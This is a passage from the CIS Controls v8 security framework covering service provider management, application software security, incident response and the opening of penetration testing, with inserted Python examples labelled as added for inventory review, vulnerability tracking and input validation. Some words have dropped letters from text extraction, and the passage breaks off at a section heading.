risks that are not managed within the enterprise are transferred to entities outside the
enterprise.

While reviewing the security of third parties has been a task performed for decades, there is
not a universal standard for assessing security; and many service providers are being
audited by their customers multiple times a month, causing impacts to their own
productivity. This is because every enterprise has a different "checklist" or set of standards to
grade the service provider. There are only a few industry standards, such as in finance, with
the Shared Assessments program, or in higher education, with the Higher Education
Community Vendor Assessment Toolkit (HECVAT). Insurance companies selling cybersecurity
policies also have their own measurements.

While an enterprise might put a lot of scrutiny into large cloud or application hosting
companies because they are hosting their email or critical business applications, smaller firms
are often a greater risk. Oftentimes, a third-party service provider contracts with additional
parties to provide other plugins or services, such as when a third party uses a fourth-party
platform or product to support the main enterprise.

Procedures and tools

Most enterprises have traditionally used standard checklists, such as ones from ISO 27001 or
the CIS Controls. Often, this process is managed through spreadsheets; however, there are
online platforms now that allow central management of this process. The focus of this CIS
Control, though, is not on the checklist; instead it is on the fundamentals of the program. Make
sure to revisit annually, as relationships and data may change.

No matter what the enterprise's size, there should be a policy about reviewing service
providers, an inventory of these vendors, and a risk rating associated with their potential
impact to the business in case of an incident. There should also be language in the contracts
to hold them accountable if there is an incident that impacts the enterprise.

There are third-party assessment platforms that have an inventory of thousands of service
providers, which attempt to provide a central view of the industry, to help enterprises make
more informed risk decisions. These platforms often have a dynamic risk score for service
providers, based (usually) on passive technical assessments, or enriched through other firms'
third-party assessments.

When performing reviews, focus on the services or departments of the provider that are
supporting the enterprise. A third party that has a managed security service contract, or
retainer, and holds cybersecurity insurance, can also help with risk reduction.

It is also important to securely decommission service providers when contracts are completed
or terminated. Decommission activities may include user and service account deactivation,
termination of data flows, and secure disposal of enterprise data within service provider
systems.

→ Refer to NIST® SP 800-88r1: Guidelines for Media Sanitization, as appropriate – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf

Safeguards
Number and Title | Asset Type | Security Function | Implementation Groups

15.1 Establish and Maintain an Inventory of Service Providers | N/A | Identify | IG1, IG2, IG3
Establish and maintain an inventory of service providers. The inventory is to list all known service providers, include classification(s), and designate an enterprise contact for each service provider. Review and update the inventory annually, or when significant enterprise changes occur that could impact this Safeguard.



15.2 Establish and Maintain a Service Provider Management Policy | N/A | Identify | IG2, IG3
Establish and maintain a service provider management policy. Ensure the policy addresses the classification, inventory, assessment, monitoring, and decommissioning of service providers. Review and update the policy annually, or when significant enterprise changes occur that could impact this Safeguard.

15.3 Classify Service Providers | N/A | Identify | IG2, IG3
Classify service providers. Classification consideration may include one or more characteristics, such as data sensitivity, data volume, availability requirements, applicable regulations, inherent risk, and mitigated risk. Update and review classifications annually, or when significant enterprise changes occur that could impact this Safeguard.

15.4 Ensure Service Provider Contracts Include Security Requirements | N/A | Protect | IG2, IG3
Ensure service provider contracts include security requirements. Example requirements may include minimum security program requirements, security incident and/or data breach notification and response, data encryption requirements, and data disposal commitments. These security requirements must be consistent with the enterprise’s service provider management policy. Review service provider contracts annually to ensure contracts are not missing security requirements.

15.5 Assess Service Providers | N/A | Identify | IG3
Assess service providers consistent with the enterprise’s service provider management policy. Assessment scope may vary based on classification(s), and may include review of standardized assessment reports, such as Service Organization Control 2 (SOC 2) and Payment Card Industry (PCI) Attestation of Compliance (AoC), customized questionnaires, or other appropriately rigorous processes. Reassess service providers annually, at a minimum, or with new and renewed contracts.

15.6 Monitor Service Providers | N/A | Identify | IG3
Monitor service providers consistent with the enterprise’s service provider management policy. Monitoring may include periodic reassessment of service provider compliance, monitoring service provider release notes, and dark web monitoring.

15.7 Securely Decommission Service Providers | Data | Protect | IG3
Securely decommission service providers. Example considerations include user and service account deactivation, termination of data flows, and secure disposal of enterprise data within service provider systems.



Application Software Security
Safeguards Total: 14 | IG1: 0/14 | IG2: 11/14 | IG3: 14/14

Overview: Manage the security life cycle of in-house developed, hosted, or acquired software to prevent, detect, and remediate security weaknesses before they can impact the enterprise.

Why is this Control critical?

Applications provide a human-friendly interface to allow users to access and manage data in a way that is aligned to business functions. They also minimize the need for users to deal directly with complex (and potentially error-prone) system functions, like logging into a database to insert or modify files. Enterprises use applications to manage their most sensitive data and control access to system resources. Therefore, an attacker can use the application itself to compromise the data, instead of an elaborate network and system hacking sequence that attempts to bypass network security controls and sensors. This is why protecting user credentials (specifically application credentials) defined in CIS Control 6 is so important.

Lacking credentials, application flaws are the attack vector of choice. However, today’s applications are developed, operated, and maintained in a highly complex, diverse, and dynamic environment. Applications run on multiple platforms: web, mobile, cloud, etc., with application architectures that are more complex than legacy client-server or database-web server structures. Development life cycles have become shorter, transitioning from months or years in long waterfall methodologies, to DevOps cycles with frequent code updates. Also, applications are rarely created from scratch, and are often “assembled” from a complex mix of development frameworks, libraries, existing code, and new code. There are also modern and evolving data protection regulations dealing with user privacy. These may require compliance to regional or sector-specific data protection requirements.

These factors make traditional approaches to security, like control (of processes, code sources, run-time environment, etc.), inspection, and testing, much more challenging. Also, the risk that an application vulnerability introduces might not be understood, except in a specific operational setting or context.

Application vulnerabilities can be present for many reasons: insecure design, insecure infrastructure, coding mistakes, weak authentication, and failure to test for unusual or unexpected conditions. Attackers can exploit specific vulnerabilities, including buffer overflows, exposure to Structured Query Language (SQL) injection, cross-site scripting, cross-site request forgery, and click-jacking of code to gain access to sensitive data, or take control over vulnerable assets within the infrastructure as a launching point for further attacks.

Applications and websites can also be used to harvest credentials, data, or attempt to install malware onto the users who access them.

Finally, it is now more common to acquire Software as a Service (SaaS) platforms, where software is developed and managed entirely through a third-party. These might be hosted anywhere in the world. This brings challenges to enterprises that need to know what risks they are accepting with using these platforms; and, they often do not have visibility into the development and application security practices of these platforms. Some of these SaaS platforms allow for customizing of their interfaces and databases. Enterprises that extend these applications should follow this CIS Control, similar to if they were doing ground-up custom development.

Procedures and tools

For Version 8, CIS partnered with SAFECode to help develop the procedures and Safeguards for this updated Application Software Security Control. However, application software security is a large topic on its own, and so (consistent with the principles of the overall CIS Controls), we focus here on the most critical Safeguards. These were derived from a companion paper on application software security that SAFECode developed (referenced below), which provides a more in-depth treatment of the topic, and is consistent with SAFECode’s existing body of content.

SAFECode developed a three-tiered approach to help readers identify which Development Group (DG) they fit in as a maturity scale for development programs. The three CIS IG levels used within the Safeguards inspired their approach for the DGs below:

Development Group 1

• The enterprise largely relies on off-the-shelf or Open Source Software (OSS) and packages with only the occasional addition of small applications or website coding. The enterprise is capable of applying basic operational and procedural best practices and of managing the security of its vendor-supplied software as a result of following the guidance of the CIS Controls.

Development Group 2

• The enterprise relies on some custom (in-house or contractor-developed) web and/or native code applications integrated with third-party components and runs on-premises or in the cloud. The enterprise has a development staff that applies software development best practices. The enterprise is attentive to the quality and maintenance of third-party open source or commercial code on which it depends.

Development Group 3

• The enterprise makes a major investment in custom software that it requires to run its business and serve its customers. It may host software on its own infrastructure, in the cloud, or both, and may integrate a large range of third-party open source and commercial software components. Software vendors and enterprises that deliver SaaS should consider Development Group 3 as a minimum set of requirements.

CIS Controls v8 Control 16: Applica on So ware Security Page 58


The first step in developing an application security program is implementing a vulnerability management process. This process must integrate into the development life cycle, and should be lightweight to insert into the standard bug-fixing process. The process should include root cause analysis to fix underlying flaws so as to reduce future vulnerabilities, and a severity rating to prioritize remediation efforts.

Developers need to be trained in application security concepts and secure coding practices. This includes a process to acquire or evaluate third-party software, modules, and libraries used in the application to ensure they do not introduce security flaws. The developers should be taught what types of modules they can securely use, where they can be safely acquired, and which components they can, or should not, develop themselves (e.g., encryption).

Weaknesses in the infrastructure that supports these applications can introduce risk. The CIS Controls and the concept of minimizing the attack surface can help secure networks, systems, and accounts that are used within the application. Specific guidance can be found in CIS Controls 1-7, 12, and 13.

The ideal application security program is one that introduces security as early into the software development life cycle as possible. The management of security problems should be consistent and integrated with standard software flaw/bug management, as opposed to a separate process that competes for development resources. Larger or more mature development teams should consider the practice of threat modeling in the design phase. Design-level vulnerabilities are less common than code-level vulnerabilities; however, they often are very severe and much harder to fix quickly. Threat modeling is the process of identifying and addressing application security design flaws before code is created. Threat modeling requires specific training, technical, and business knowledge. It is best conducted through internal “security champions” in each development team, to lead threat modeling practices for that team’s software. It also provides valuable context to downstream activities, such as root cause analysis and security testing.

Larger, or commercial, development teams may also consider a bug bounty program where individuals are paid for finding flaws in their applications. Such a program is best used to supplement an in-house secure development process and can provide an efficient mechanism for identifying classes of vulnerabilities that the process needs to focus on.

Finally, in 2020 NIST® published its Secure Software Development Framework (SSDF), which brought together what the industry has learned about software security over the past two decades and created a secure software development framework for planning, evaluating, and communicating about software security activities. Enterprises acquiring software or services can use this framework to build their security requirements and understand whether a software provider’s development process follows best practices. These are some application security resources:

→ SAFECode Application Security Addendum – https://safecode.org/cis-controls/

→ NIST® SSDF – https://csrc.nist.gov/News/2020/mitigating-risk-of-software-vulns-ssdf

→ The Software Alliance – https://www.bsa.org/reports/updated-bsa-framework-for-secure-software

→ OWASP® – https://owasp.org/



Safeguards
Number and Title | Asset Type | Security Function | Implementation Groups

16.1 Establish and Maintain a Secure Application Development Process | Applications | Protect | IG2, IG3
Establish and maintain a secure application development process. In the process, address such items as: secure application design standards, secure coding practices, developer training, vulnerability management, security of third-party code, and application security testing procedures. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

16.2 Establish and Maintain a Process to Accept and Address Software Vulnerabilities | Applications | Protect | IG2, IG3
Establish and maintain a process to accept and address reports of software vulnerabilities, including providing a means for external entities to report. The process is to include such items as: a vulnerability handling policy that identifies reporting process, responsible party for handling vulnerability reports, and a process for intake, assignment, remediation, and remediation testing. As part of the process, use a vulnerability tracking system that includes severity ratings, and metrics for measuring timing for identification, analysis, and remediation of vulnerabilities. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Third-party application developers need to consider this an externally-facing policy that helps to set expectations for outside stakeholders.

16.3 Perform Root Cause Analysis on Security Vulnerabilities | Applications | Protect | IG2, IG3
Perform root cause analysis on security vulnerabilities. When reviewing vulnerabilities, root cause analysis is the task of evaluating underlying issues that create vulnerabilities in code, and allows development teams to move beyond just fixing individual vulnerabilities as they arise.

16.4 Establish and Manage an Inventory of Third-Party Software Components | Applications | Protect | IG2, IG3
Establish and manage an updated inventory of third-party components used in development, often referred to as a “bill of materials,” as well as components slated for future use. This inventory is to include any risks that each third-party component could pose. Evaluate the list at least monthly to identify any changes or updates to these components, and validate that the component is still supported.
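As an added example (not part of the CIS document), the Python below runs the monthly review that 16.4 describes over two constructed snapshots of a component inventory: it diffs the snapshots and flags components that are unsupported, overdue for review, or slated for use with open risks. Component names, versions, dates and the 31-day review cut-off are assumptions.

```python
"""Added example, not from the CIS document: a monthly review over a constructed
third-party component inventory ("bill of materials") as Safeguard 16.4 describes.
The component names, versions, dates and the review interval are assumptions."""
from datetime import date, timedelta

REVIEW_INTERVAL = timedelta(days=31)   # "at least monthly" (assumed cut-off)


def make_component(name, version, supplier, last_reviewed,
                   support_end=None, risks=(), planned=False):
    """One inventory entry; support_end=None means no end-of-support date is known."""
    return {
        "name": name, "version": version, "supplier": supplier,
        "last_reviewed": last_reviewed, "support_end": support_end,
        "risks": list(risks), "planned": planned,
    }


def sample_inventories():
    """Constructed snapshots: last month's inventory, this month's, and the review date."""
    previous = [
        make_component("webfw", "2.3.1", "example-org", date(2023, 1, 10)),
        make_component("jsonlib", "1.0.9", "example-org", date(2023, 1, 10)),
        make_component("oldcrypto", "0.8.0", "example-org", date(2022, 11, 1),
                       support_end=date(2023, 1, 31),
                       risks=["supplier announced end of life"]),
    ]
    current = [
        make_component("webfw", "2.4.0", "example-org", date(2023, 2, 12)),
        make_component("jsonlib", "1.0.9", "example-org", date(2023, 1, 10)),
        make_component("oldcrypto", "0.8.0", "example-org", date(2022, 11, 1),
                       support_end=date(2023, 1, 31),
                       risks=["supplier announced end of life"]),
        # slated for future use, so it belongs in the inventory before it is adopted
        make_component("authsdk", "3.1.0", "example-org", date(2023, 2, 12),
                       planned=True, risks=["handles credentials; not yet assessed"]),
    ]
    return previous, current, date(2023, 2, 15)


def diff_inventory(previous, current):
    """Changes since the last review: added, removed, and version-changed components."""
    prev = {c["name"]: c for c in previous}
    cur = {c["name"]: c for c in current}
    return {
        "added": sorted(cur.keys() - prev.keys()),
        "removed": sorted(prev.keys() - cur.keys()),
        "version_changed": sorted(n for n in cur.keys() & prev.keys()
                                  if cur[n]["version"] != prev[n]["version"]),
    }


def review_findings(current, today):
    """Items needing action this cycle: unsupported, review overdue, or planned with open risks."""
    findings = []
    for c in current:
        if c["support_end"] is not None and c["support_end"] < today:
            findings.append((c["name"], "unsupported since %s" % c["support_end"].isoformat()))
        if today - c["last_reviewed"] > REVIEW_INTERVAL:
            findings.append((c["name"], "review overdue (last reviewed %s)"
                             % c["last_reviewed"].isoformat()))
        if c["planned"] and c["risks"]:
            findings.append((c["name"], "planned component with open risks: "
                             + "; ".join(c["risks"])))
    return sorted(findings)


if __name__ == "__main__":
    previous, current, today = sample_inventories()
    print(diff_inventory(previous, current))
    for name, reason in review_findings(current, today):
        print(f"{name}: {reason}")
```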

16.5 Use Up-to-Date and Trusted Third-Party Software Components | Applications | Protect | IG2, IG3
Use up-to-date and trusted third-party software components. When possible, choose established and proven frameworks and libraries that provide adequate security. Acquire these components from trusted sources or evaluate the software for vulnerabilities before use.

16.6 Establish and Maintain a Severity Rating System and Process for Application Vulnerabilities | Applications | Protect | IG2, IG3
Establish and maintain a severity rating system and process for application vulnerabilities that facilitates prioritizing the order in which discovered vulnerabilities are fixed. This process includes setting a minimum level of security acceptability for releasing code or applications. Severity ratings bring a systematic way of triaging vulnerabilities that improves risk management and helps ensure the most severe bugs are fixed first. Review and update the system and process annually.
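As an added example (not from the CIS document or SAFECode's material), the following Python sketch applies 16.2 and 16.6 to constructed sample reports: intake, assignment, remediation, timing metrics, a severity-ordered backlog, and a release gate that enforces a minimum level of acceptability. The severity scale, SLA days and the gate threshold are assumed policy values.

```python
"""Added example (not CIS's own tooling): a minimal vulnerability tracker that
applies Safeguards 16.2 and 16.6 to constructed sample data.  Severity labels,
SLA days and the release threshold are assumptions, not from the CIS document."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Assumed severity scale and, per severity, the target days from report to fix.
SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}
REMEDIATION_SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}
# Assumed minimum acceptability for release: nothing open at or above this level.
RELEASE_BLOCK_AT = "high"


@dataclass
class VulnReport:
    vuln_id: str
    source: str                                # who reported it (scan, researcher, pentest)
    severity: str                              # reporter's initial rating, revised at triage
    reported_at: datetime                      # intake: when the report was received
    triaged_at: Optional[datetime] = None      # analysis: severity confirmed, owner assigned
    fixed_at: Optional[datetime] = None        # remediation: fix merged and tested
    owner: Optional[str] = None
    root_cause: Optional[str] = None           # recorded for root cause analysis (16.3)

    def is_open(self) -> bool:
        return self.fixed_at is None


def triage(report, owner, severity, now):
    """Assignment step: record the owner, the confirmed severity and the triage time."""
    if severity not in SEVERITY_RANK:
        raise ValueError(f"unknown severity {severity!r}")
    report.owner = owner
    report.severity = severity
    report.triaged_at = now


def remediate(report, now, root_cause):
    """Remediation step: a report cannot be closed until it has been analysed."""
    if report.triaged_at is None:
        raise ValueError(f"{report.vuln_id} cannot be closed before triage")
    report.fixed_at = now
    report.root_cause = root_cause


def timing_metrics(report, now):
    """16.2 metrics: days to triage, days to remediation, and whether the SLA holds."""
    triage_days = None if report.triaged_at is None else (report.triaged_at - report.reported_at).days
    days_open = ((report.fixed_at or now) - report.reported_at).days
    return {
        "days_to_triage": triage_days,
        "days_to_remediation": days_open if report.fixed_at else None,
        "days_open": days_open,
        "within_sla": days_open <= REMEDIATION_SLA_DAYS[report.severity],
    }


def prioritized_backlog(reports):
    """Open items, most severe first, then oldest first (16.6: fix the worst bugs first)."""
    return sorted((r for r in reports if r.is_open()),
                  key=lambda r: (-SEVERITY_RANK[r.severity], r.reported_at))


def release_gate(reports):
    """Release is allowed only if nothing open is rated at or above RELEASE_BLOCK_AT.
    Returns (allowed, ids of the blocking items)."""
    threshold = SEVERITY_RANK[RELEASE_BLOCK_AT]
    blocking = [r.vuln_id for r in prioritized_backlog(reports)
                if SEVERITY_RANK[r.severity] >= threshold]
    return (len(blocking) == 0, blocking)


def sample_tracker():
    """Constructed sample data: three reports at different stages, and the current time."""
    t0 = datetime(2023, 3, 1)
    reports = [
        VulnReport("VULN-1", "external researcher", "medium", t0),
        VulnReport("VULN-2", "internal SAST scan", "low", t0 + timedelta(days=2)),
        VulnReport("VULN-3", "penetration test", "medium", t0 + timedelta(days=5)),
    ]
    # analysis raised VULN-1 to critical; it was fixed three days later
    triage(reports[0], "team-payments", "critical", t0 + timedelta(days=1))
    remediate(reports[0], t0 + timedelta(days=4), "missing server-side authorization check")
    triage(reports[2], "team-web", "high", t0 + timedelta(days=6))
    return reports, t0 + timedelta(days=10)


if __name__ == "__main__":
    reports, now = sample_tracker()
    for r in reports:
        print(r.vuln_id, r.severity, timing_metrics(r, now))
    print("release allowed:", release_gate(reports))
```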

16.7 Use Standard Hardening Configuration Templates for Application Infrastructure | Applications | Protect | IG2, IG3
Use standard, industry-recommended hardening configuration templates for application infrastructure components. This includes underlying servers, databases, and web servers, and applies to cloud containers, Platform as a Service (PaaS) components, and SaaS components. Do not allow in-house developed software to weaken configuration hardening.

16.8 Separate Production and Non-Production Systems | Applications | Protect | IG2, IG3
Maintain separate environments for production and non-production systems.


16.9 Train Developers in Application Security Concepts and Secure Coding | Applications | Protect | IG2, IG3
Ensure that all software development personnel receive training in writing secure code for their specific development environment and responsibilities. Training can include general security principles and application security standard practices. Conduct training at least annually and design in a way to promote security within the development team, and build a culture of security among the developers.

16.10 Apply Secure Design Principles in Application Architectures | Applications | Protect | IG2, IG3
Apply secure design principles in application architectures. Secure design principles include the concept of least privilege and enforcing mediation to validate every operation that the user makes, promoting the concept of “never trust user input.” Examples include ensuring that explicit error checking is performed and documented for all input, including for size, data type, and acceptable ranges or formats. Secure design also means minimizing the application infrastructure attack surface, such as turning off unprotected ports and services, removing unnecessary programs and files, and renaming or removing default accounts.
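As an added example (not CIS's code), the following Python handler applies the 16.10 principles to a constructed transfer request: explicit checks on size, data type, ranges and formats for every field, rejection of unexpected fields, and server-side mediation of account ownership before any operation is performed. Field names, limits, the account id format and the ownership table are all assumptions.

```python
"""Added example, not from the CIS document: server-side input validation and complete
mediation for a constructed 'transfer' request, applying Safeguard 16.10.  Field names,
limits, the account id format and the ownership table are assumptions."""
import re

# Every limit is explicit and documented here: size, type, range and format (assumed values).
ACCOUNT_ID_RE = re.compile(r"^[A-Z]{2}[0-9]{8}$")      # assumed account id format
MEMO_RE = re.compile(r"^[A-Za-z0-9 .,'-]*$")            # allowlist of memo characters
MEMO_MAX_LEN = 64
AMOUNT_MIN_CENTS, AMOUNT_MAX_CENTS = 1, 100_000_000
ALLOWED_CURRENCIES = {"USD", "EUR", "GBP"}
REQUIRED_FIELDS = {"from_account", "to_account", "amount_cents", "currency", "memo"}

# Constructed ownership table used for mediation (which user may operate on which account).
ACCOUNT_OWNERS = {"US12345678": "alice", "GB87654321": "bob", "DE11112222": "alice"}


class ValidationError(ValueError):
    """Raised with a list of every check that failed, so the caller can log all of them."""


def validate_transfer(raw):
    """Return a cleaned request built only from validated values, or raise ValidationError."""
    if not isinstance(raw, dict):
        raise ValidationError(["request body must be a JSON object"])
    errors = []
    missing = REQUIRED_FIELDS - set(raw)
    extra = set(raw) - REQUIRED_FIELDS
    if missing:
        errors.append(f"missing fields: {sorted(missing)}")
    if extra:
        errors.append(f"unexpected fields: {sorted(extra)}")   # reject, never silently ignore
    if errors:
        raise ValidationError(errors)

    for name in ("from_account", "to_account"):            # format check
        value = raw[name]
        if not isinstance(value, str) or not ACCOUNT_ID_RE.fullmatch(value):
            errors.append(f"{name}: must match {ACCOUNT_ID_RE.pattern}")
    amt = raw["amount_cents"]                               # type and range check
    if isinstance(amt, bool) or not isinstance(amt, int):   # bool is an int subclass in Python
        errors.append("amount_cents: must be an integer")
    elif not AMOUNT_MIN_CENTS <= amt <= AMOUNT_MAX_CENTS:
        errors.append(f"amount_cents: must be between {AMOUNT_MIN_CENTS} and {AMOUNT_MAX_CENTS}")
    cur = raw["currency"]                                   # allowlist check
    if not isinstance(cur, str) or cur not in ALLOWED_CURRENCIES:
        errors.append(f"currency: must be one of {sorted(ALLOWED_CURRENCIES)}")
    memo = raw["memo"]                                      # type, size and character set
    if not isinstance(memo, str):
        errors.append("memo: must be a string")
    else:
        if len(memo) > MEMO_MAX_LEN:
            errors.append(f"memo: longer than {MEMO_MAX_LEN} characters")
        if not MEMO_RE.fullmatch(memo):
            errors.append("memo: contains characters outside the allowed set")
    if raw["from_account"] == raw["to_account"]:
        errors.append("from_account and to_account must differ")
    if errors:
        raise ValidationError(errors)
    return {"from_account": raw["from_account"], "to_account": raw["to_account"],
            "amount_cents": amt, "currency": cur, "memo": memo}


def authorize_transfer(user, req):
    """Complete mediation: ownership is checked server-side on every call, whatever the client claims."""
    if ACCOUNT_OWNERS.get(req["from_account"]) != user:
        raise PermissionError(f"{user} may not transfer from {req['from_account']}")
    if req["to_account"] not in ACCOUNT_OWNERS:
        raise ValidationError(["to_account: unknown account"])
    return req


def handle_transfer(user, raw):
    """Validate, then authorize; returns a result dict rather than raising, for callers."""
    try:
        req = authorize_transfer(user, validate_transfer(raw))
    except ValidationError as e:
        return {"status": "rejected", "errors": list(e.args[0])}
    except PermissionError as e:
        return {"status": "forbidden", "errors": [str(e)]}
    return {"status": "accepted", "request": req}


if __name__ == "__main__":
    # constructed request
    print(handle_transfer("alice", {"from_account": "US12345678", "to_account": "GB87654321",
                                    "amount_cents": 2500, "currency": "USD", "memo": "rent"}))
```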

16.11 Leverage Vetted Modules or Services for Application Security Components | Applications | Protect | IG2, IG3
Leverage vetted modules or services for application security components, such as identity management, encryption, and auditing and logging. Using platform features in critical security functions will reduce developers’ workload and minimize the likelihood of design or implementation errors. Modern operating systems provide effective mechanisms for identification, authentication, and authorization and make those mechanisms available to applications. Use only standardized, currently accepted, and extensively reviewed encryption algorithms. Operating systems also provide mechanisms to create and maintain secure audit logs.

16.12 Implement Code-Level Security Checks | Applications | Protect | IG3
Apply static and dynamic analysis tools within the application life cycle to verify that secure coding practices are being followed.

16.13 Conduct Application Penetration Testing | Applications | Protect | IG3
Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing. Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.

16.14 Conduct Threat Modeling | Applications | Protect | IG3
Conduct threat modeling. Threat modeling is the process of identifying and addressing application security design flaws within a design, before code is created. It is conducted through specially trained individuals who evaluate the application design and gauge security risks for each entry point and access level. The goal is to map out the application, architecture, and infrastructure in a structured way to understand its weaknesses.



Incident Response Management
Safeguards Total: 9 | IG1: 3/9 | IG2: 8/9 | IG3: 9/9

Overview: Establish a program to develop and maintain an incident response capability (e.g., policies, plans, procedures, defined roles, training, and communications) to prepare, detect, and quickly respond to an attack.

Why is this Control critical?

A comprehensive cybersecurity program includes protections, detections, response, and recovery capabilities. Often, the final two get overlooked in immature enterprises, or the response technique to compromised systems is just to re-image them to original state, and move on. The primary goal of incident response is to identify threats on the enterprise, respond to them before they can spread, and remediate them before they can cause harm. Without understanding the full scope of an incident, how it happened, and what can be done to prevent it from happening again, defenders will just be in a perpetual “whack-a-mole” pattern.

We cannot expect our protections to be effective 100% of the time. When an incident occurs, if an enterprise does not have a documented plan—even with good people—it is almost impossible to know the right investigative procedures, reporting, data collection, management responsibility, legal protocols, and communications strategy that will allow the enterprise to successfully understand, manage, and recover.

Along with detection, containment, and eradication, communication to stakeholders is key. If we are to reduce the probability of material impact due to a cyber event, the enterprise’s leadership must know what potential impact there could be, so that they can help prioritize remediation or restoration decisions that best support the enterprise. These business decisions could be based on regulatory compliance, disclosure rules, service-level agreements with partners or customers, revenue, or mission impacts.

Dwell time from when an attack happens to when it is identified can be days, weeks, or months. The longer the attacker is in the enterprise’s infrastructure, the more embedded they become and they will develop more ways to maintain persistent access for when they are eventually discovered. With the rise of ransomware, which is a stable moneymaker for attackers, this dwell time is critical, especially with modern tactics of stealing data before encrypting it for ransom.

CIS Controls v8 Control 17: Incident Response Management Page 62


Procedures and tools
Even if an enterprise does not have resources to conduct incident response within an enterprise, it is still critical to have a plan. This would include the sources for protections and detections, a list of who to call upon for assistance, and communication plans about how to convey information to leadership, employees, regulators, partners, and customers.

After defining incident response procedures, the incident response team, or a third-party, should engage in periodic scenario-based training, working through a series of attack scenarios fine-tuned to the threats and potential impacts the enterprise faces. These scenarios help ensure that enterprise leadership and technical team members understand their role in the incident response process to help prepare them to handle incidents. It is inevitable that exercise and training scenarios will identify gaps in plans and processes, and unexpected dependencies, which can then be updated into the plan.

More mature enterprises should include threat intelligence and/or threat hunting into their incident response process. This will help the team become more proactive, identifying key or primary attackers to their enterprise or industry to monitor or search for their TTPs. This will help focus detections and define response procedures to identify and remediate more quickly.

The actions in CIS Control 17 provide specific, high-priority steps that can improve enterprise security, and should be a part of any comprehensive incident and response plan. In addition, we recommend the following resource dedicated to this topic:

→ Council of Registered Security Testers (CREST) Cyber Security Incident Response Guide – https://www.crest-approved.org/wp-content/uploads/2014/11/CSIR-Procurement-Guide.pdf. CREST provides guidance, standards, and knowledge on a wide variety of cyber defense topics.

Safeguards
Number and Title | Asset Type | Security Function | Implementation Groups

17.1 Designate Personnel to Manage Incident Handling | N/A | Respond | IG1, IG2, IG3
Designate one key person, and at least one backup, who will manage the enterprise’s incident handling process. Management personnel are responsible for the coordination and documentation of incident response and recovery efforts and can consist of employees internal to the enterprise, third-party vendors, or a hybrid approach. If using a third-party vendor, designate at least one person internal to the enterprise to oversee any third-party work. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.2 Establish and Maintain Contact Information for Reporting Security Incidents | N/A | Respond | IG1, IG2, IG3
Establish and maintain contact information for parties that need to be informed of security incidents. Contacts may include internal staff, third-party vendors, law enforcement, cyber insurance providers, relevant government agencies, Information Sharing and Analysis Center (ISAC) partners, or other stakeholders. Verify contacts annually to ensure that information is up-to-date.

17.3 Establish and Maintain an Enterprise Process for Reporting Incidents | N/A | Respond | IG1, IG2, IG3



Establish and maintain an enterprise process for the workforce to report security incidents. The process includes reporting timeframe, personnel to report to, mechanism for reporting, and the minimum information to be reported. Ensure the process is publicly available to all of the workforce. Review annually, or when significant enterprise changes occur that could impact this Safeguard.


17.4 Establish and Maintain an Incident Response Process | N/A | Respond | IG2, IG3
Establish and maintain an incident response process that addresses roles and responsibilities, compliance requirements, and a communication plan. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.5 Assign Key Roles and Responsibilities | N/A | Respond | IG2, IG3
Assign key roles and responsibilities for incident response, including staff from legal, IT, information security, facilities, public relations, human resources, incident responders, and analysts, as applicable. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.6 Define Mechanisms for Communicating During Incident Response | N/A | Respond | IG2, IG3
Determine which primary and secondary mechanisms will be used to communicate and report during a security incident. Mechanisms can include phone calls, emails, or letters. Keep in mind that certain mechanisms, such as emails, can be affected during a security incident. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.7 Conduct Routine Incident Response Exercises | N/A | Recover | IG2, IG3
Plan and conduct routine incident response exercises and scenarios for key personnel involved in the incident response process to prepare for responding to real-world incidents. Exercises need to test communication channels, decision-making, and workflows. Conduct testing on an annual basis, at a minimum.

17.8 Conduct Post-Incident Reviews | N/A | Recover | IG2, IG3
Conduct post-incident reviews. Post-incident reviews help prevent incident recurrence through identifying lessons learned and follow-up action.

17.9 Establish and Maintain Security Incident Thresholds | N/A | Recover | IG3
Establish and maintain security incident thresholds, including, at a minimum, differentiating between an incident and an event. Examples can include: abnormal activity, security vulnerability, security weakness, data breach, privacy incident, etc. Review annually, or when significant enterprise changes occur that could impact this Safeguard.



Penetration Testing
Safeguards Total: 5 | IG1: 0/5 | IG2: 3/5 | IG3: 5/5

Overview: Test the effectiveness and resiliency of enterprise assets through identifying and exploiting weaknesses in controls (people, processes, and technology), and simulating the objectives and actions of an attacker.

Why is this Control critical?

A successful defensive posture requires a comprehensive program of effective policies and governance, strong technical defenses, combined with appropriate action from people. However, it is rarely perfect. In a complex environment where technology is constantly evolving and new attacker tradecraft appears regularly, enterprises should periodically test their controls to identify gaps and to assess their resiliency. This test may be from external network, internal network, application, system, or device perspective. It may include social engineering of users, or physical access control bypasses.

Often, penetration tests are performed for specific purposes:

• As a “dramatic” demonstration of an attack, usually to convince decision-makers of their enterprise’s weaknesses
• As a means to test the correct operation of enterprise defenses (“verification”)
• To test that the enterprise has built the right defenses in the first place (“validation”)

Independent penetration testing can provide valuable and objective insights about the existence of vulnerabilities in enterprise assets and humans, and the efficacy of defenses and mitigating controls to protect against adverse impacts to the enterprise. They are part of a comprehensive, ongoing program of security management and improvement. They can also reveal process weaknesses, such as incomplete or inconsistent configuration management, or end-user training.

Penetration testing differs from vulnerability testing, described in CIS Control 7. Vulnerability testing just checks for presence of known, insecure enterprise assets, and stops there. Penetration testing goes further to exploit those weaknesses to see how far an attacker could get, and what business process or data might be impacted through exploitation of that vulnerability. This is an important detail, and often penetration testing and vulnerability testing are incorrectly used interchangeably. Vulnerability testing is exclusively automated scanning with sometimes manual validation of false positives, whereas penetration testing requires more human involvement and analysis, sometimes supported through the use of custom tools or scripts. However, vulnerability testing is often a starting point for a penetration test.

CIS Controls v8 Control 18: Penetration Testing Page 65

Another common term is “Red Team” exercises. These are similar to penetra on tests in that
vulnerabili es are exploited; however, the difference is the focus. Red Teams simulate specific
a acker TTPs to evaluate how an enterprise’s environment would withstand an a ack from a
specific adversary, or category of adversaries.

Procedures and tools

